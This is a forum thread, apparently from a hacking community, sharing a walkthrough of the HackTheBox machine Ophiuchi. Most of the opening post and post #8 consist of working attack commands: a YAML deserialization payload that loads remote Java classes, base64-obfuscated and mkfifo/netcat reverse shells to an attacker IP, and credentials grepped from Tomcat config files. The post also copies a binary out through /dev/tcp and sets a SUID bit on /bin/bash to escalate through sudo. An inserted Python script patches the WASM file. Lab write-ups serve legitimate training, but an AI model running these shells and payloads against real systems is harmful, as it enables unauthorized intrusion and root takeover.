TUTORIAL Hackthebox Writeup Ophiuchi
by randomname83 - February 14, 2021 at 01:05 AM
#1
root hash (spoiler):
root:$6$oPgtRE0IgWrXKitG$Z5FyXxEXm5l.skZbIBKm0poPFPUxgZVY5DPii0DFsQgSBiL98ioRBuHDVzOHaZCgH.xyLnpGIksHlfBXC4LQo/:18554:0:99999:7:::

get user (spoiler):
exploit: https://github.com/artsploit/yaml-payload


git clone https://github.com/artsploit/yaml-payload


create rev shell command:
cmd="bash -c 'bash -i >& /dev/tcp/10.10.10.10/9001 0>&1'"
jex="bash -c {echo,$(echo -n $cmd | base64)}|{base64,-d}|{bash,-i}"
echo $jex


paste rev shell command into file src/artsploit/AwesomeScriptEngineFactory.java at line 12
delete line 13

compile and serve:
javac src/artsploit/AwesomeScriptEngineFactory.java
cd src
python3 -m http.server 80


trigger exploit: browse to http://10.10.10.227:8080/ and enter:
!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://10.10.10.10/"]
  ]]
]


privesc from tomcat to admin:
cd ~
cd conf
cat * | grep pass
su admin
# pass = whythereisalimit

get root (spoiler):
ssh admin@10.10.10.227
# pass = whythereisalimit

privesc from admin to root:
sudo -l


download main.wasm:
1. start a listener on your machine:
nc -lvnp 9002 > main.wasm
2. send the file from the target (same port as the listener):
cat /opt/wasm-functions/main.wasm > /dev/tcp/10.10.10.10/9002


analyze file:
1. upload at https://webassembly.github.io/wabt/demo/...index.html
2. edit the 0 to a 1 and copy the code:
(module
  (type $t0 (func (result i32)))
  (func $info (export "info") (type $t0) (result i32)
    (i32.const 1))
  (table $T0 1 1 funcref)
  (memory $memory (export "memory") 16)
  (global $g0 (mut i32) (i32.const 1048576))
  (global $__data_end (export "__data_end") i32 (i32.const 1048576))
  (global $__heap_base (export "__heap_base") i32 (i32.const 1048576)))
3. paste the code at https://webassembly.github.io/wabt/demo/...index.html
4. click on download
5. transfer the downloaded file to a writeable directory on the target
6. create deploy.sh and run sudo command:

echo "chmod +s /bin/bash" > deploy.sh
sudo -u root /usr/bin/go run /opt/wasm-functions/index.go
/bin/bash -p
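Added example (my own code, not part of randomname83's post and not the box's index.go or main.wasm): the steps above work because the i32.const that the exported info function returns is flipped from 0 to 1 before index.go is run, so patching that single immediate directly in the .wasm binary is an alternative to the wasm2wat / wat2wasm round trip through the wabt demo site. The script hand-encodes the module from the WAT listing above (with info returning 0, standing in for the downloaded main.wasm; the bytes are constructed, not captured from the box), resolves the info export to its code body by walking the section layout, rewrites the LEB128 immediate, and recomputes the body and section sizes. It assumes an MVP module without imported functions (so the export index equals the code-body index) and a body that starts with i32.const, which is what the listing shows.

```python
# Added example: patch the i32.const that the exported `info` function returns,
# directly in the .wasm binary. Not from the post or the box; assumes an MVP
# module with no imported functions and a body that starts with i32.const.
WASM_HEADER = b"\0asm\x01\x00\x00\x00"
I32, OP_I32_CONST, OP_END = 0x7F, 0x41, 0x0B
SEC_EXPORT, SEC_CODE = 7, 10

def uleb(n):
    """Unsigned LEB128 (sizes, counts, indices)."""
    out = bytearray()
    while True:
        b, n = n & 0x7F, n >> 7
        out.append(b | 0x80 if n else b)
        if not n:
            return bytes(out)

def sleb(n):
    """Signed LEB128 (i32.const immediates); Python's >> is arithmetic, so negatives work."""
    out = bytearray()
    while True:
        b, n = n & 0x7F, n >> 7
        done = (n == 0 and not b & 0x40) or (n == -1 and b & 0x40)
        out.append(b if done else b | 0x80)
        if done:
            return bytes(out)

def read_leb(buf, pos, signed=False):
    """Decode one LEB128 value at buf[pos]; returns (value, position after it)."""
    result = shift = 0
    while True:
        b, pos = buf[pos], pos + 1
        result |= (b & 0x7F) << shift
        shift += 7
        if not b & 0x80:
            return (result - (1 << shift) if signed and b & 0x40 else result), pos

def vec(items):
    return uleb(len(items)) + b"".join(items)

def section(sid, payload):
    return bytes([sid]) + uleb(len(payload)) + payload

def name(s):
    return uleb(len(s.encode())) + s.encode()

def build_module(info_value):
    """My hand-encoding of the WAT listing in the post (constructed sample, not the real main.wasm)."""
    glob = lambda mut, v: bytes([I32, mut, OP_I32_CONST]) + sleb(v) + bytes([OP_END])
    body = vec([]) + bytes([OP_I32_CONST]) + sleb(info_value) + bytes([OP_END])  # no locals
    return WASM_HEADER + b"".join([
        section(1, vec([b"\x60" + vec([]) + vec([bytes([I32])])])),  # type 0: (func (result i32))
        section(3, vec([uleb(0)])),                                   # func 0 has type 0
        section(4, vec([b"\x70\x01" + uleb(1) + uleb(1)])),           # table 1 1 funcref
        section(5, vec([b"\x00" + uleb(16)])),                        # memory 16 pages
        section(6, vec([glob(1, 1048576), glob(0, 1048576), glob(0, 1048576)])),
        section(SEC_EXPORT, vec([name("info") + b"\x00" + uleb(0), name("memory") + b"\x02" + uleb(0),
                                 name("__data_end") + b"\x03" + uleb(1), name("__heap_base") + b"\x03" + uleb(2)])),
        section(SEC_CODE, vec([uleb(len(body)) + body])),
    ])

def _sections(wasm):
    """Yield (id, header offset, payload start, payload end) for every section."""
    if wasm[:8] != WASM_HEADER:
        raise ValueError("not a wasm v1 binary")
    pos = 8
    while pos < len(wasm):
        hdr = pos
        size, pos = read_leb(wasm, pos + 1)  # skip the id byte, read the payload size
        yield wasm[hdr], hdr, pos, pos + size
        pos += size

def _export_func_index(wasm, export):
    for sid, _, pos, _ in _sections(wasm):
        if sid != SEC_EXPORT:
            continue
        count, pos = read_leb(wasm, pos)
        for _ in range(count):
            n, pos = read_leb(wasm, pos)
            nm, kind = wasm[pos:pos + n], wasm[pos + n]
            idx, pos = read_leb(wasm, pos + n + 1)
            if kind == 0 and nm == export.encode():
                return idx
    raise ValueError(f"no exported function {export!r}")

def _locate_const(wasm, export="info"):
    """Offsets of the code section, the target body and its i32.const immediate."""
    target = _export_func_index(wasm, export)  # equals body index only with no imported funcs
    hdr, start, end = next((h, s, e) for sid, h, s, e in _sections(wasm) if sid == SEC_CODE)
    count, pos = read_leb(wasm, start)
    for i in range(count):
        size_pos = pos
        body_size, pos = read_leb(wasm, pos)
        body_start, body_end = pos, pos + body_size
        if i == target:
            break
        pos = body_end
    else:
        raise ValueError("function index out of range")
    nlocals, pos = read_leb(wasm, body_start)
    if nlocals != 0 or wasm[pos] != OP_I32_CONST:
        raise ValueError("body does not start with i32.const")
    _, op_end = read_leb(wasm, pos + 1, signed=True)
    return hdr, start, end, size_pos, body_start, body_end, pos + 1, op_end

def read_info_return(wasm):
    """Value the exported `info` returns (0 in the unmodified file, per the post)."""
    *_, op_start, _ = _locate_const(wasm)
    return read_leb(wasm, op_start, signed=True)[0]

def patch_info_return(wasm, value):
    """New binary with the immediate replaced; body size and section size are recomputed."""
    hdr, start, end, size_pos, body_start, body_end, op_start, op_end = _locate_const(wasm)
    new_body = wasm[body_start:op_start] + sleb(value) + wasm[op_end:body_end]
    payload = wasm[start:size_pos] + uleb(len(new_body)) + new_body + wasm[body_end:end]
    return wasm[:hdr] + section(SEC_CODE, payload) + wasm[end:]
```

To use it on the real file, read main.wasm as bytes, check with read_info_return that the unmodified copy really returns 0, write the result of patch_info_return(data, 1) back out, and place it in the writeable directory next to deploy.sh before running the sudo command from step 6. The size fix-up matters whenever the new immediate needs more LEB128 bytes than the old one (e.g. values above 63), which a plain byte replacement would corrupt.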
#2
Thank you! Much appreciated!
#3
https://jopraveen.wordpress.com/2021/02/14/ophiuchi/


Here is a writeup by Jopraveen
#4
(February 14, 2021 at 09:36 AM)RFADMIN Wrote: https://jopraveen.wordpress.com/2021/02/14/ophiuchi/


Here is a writeup by Jopraveen
and there: https://fdlucifer.github.io/2021/02/14/Ophiuchi/
#5
(February 14, 2021 at 11:06 AM)lucifer113 Wrote: and there: https://fdlucifer.github.io/2021/02/14/Ophiuchi/

Nice writeup bro
#6
(February 14, 2021 at 11:06 AM)lucifer113 Wrote: and there: https://fdlucifer.github.io/2021/02/14/Ophiuchi/

Sorry, I didn't write exactly what you need to put into the Java file.
I'm not sure if your way works...
If it doesn't work, can you please update it so it is only the output of the last command?
...
public AwesomeScriptEngineFactory() {
    try {
        Runtime.getRuntime().exec("<here output of echo $jex>");
    } catch (IOException e) {
        e.printStackTrace();
    }
}
...
#7
(February 14, 2021 at 11:59 AM)randomname83 Wrote:
(February 14, 2021 at 11:06 AM)lucifer113 Wrote: and there: https://fdlucifer.github.io/2021/02/14/Ophiuchi/

Sorry, I didn't write exactly what you need to put into the Java file.
I'm not sure if your way works...
If it doesn't work, can you please update it so it is only the output of the last command?
...
public AwesomeScriptEngineFactory() {
    try {
        Runtime.getRuntime().exec("<here output of echo $jex>");
    } catch (IOException e) {
        e.printStackTrace();
    }
}
...
It works fine, you can try it, and there are many other ways to modify the exploit. Thanks for your simple writeup... :)
#8
You don't need jex, just use:
Runtime.getRuntime().exec("sh -c $@|sh . echo `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ip 6666 >/tmp/f`");
#9
Thank you for the writeup =))
#10
(February 14, 2021 at 09:36 AM)RFADMIN Wrote: https://jopraveen.wordpress.com/2021/02/14/ophiuchi/


Here is a writeup by Jopraveen
This is shit man, the other one is good.
#11
(February 15, 2021 at 05:15 PM)nero007 Wrote:
(February 14, 2021 at 09:36 AM)RFADMIN Wrote: https://jopraveen.wordpress.com/2021/02/14/ophiuchi/


Here is a writeup by Jopraveen
This is shit man, the other one is good.
True :-)
#12
Can someone explain the web assembly part?
I have no fukkin idea why I have to change that number from 0 to 1, why I should create the deploy.sh script, and how it is called.... The write-ups only contain "do this and it will work" but none of them are telling why.... I would be grateful if someone could enlighten me!
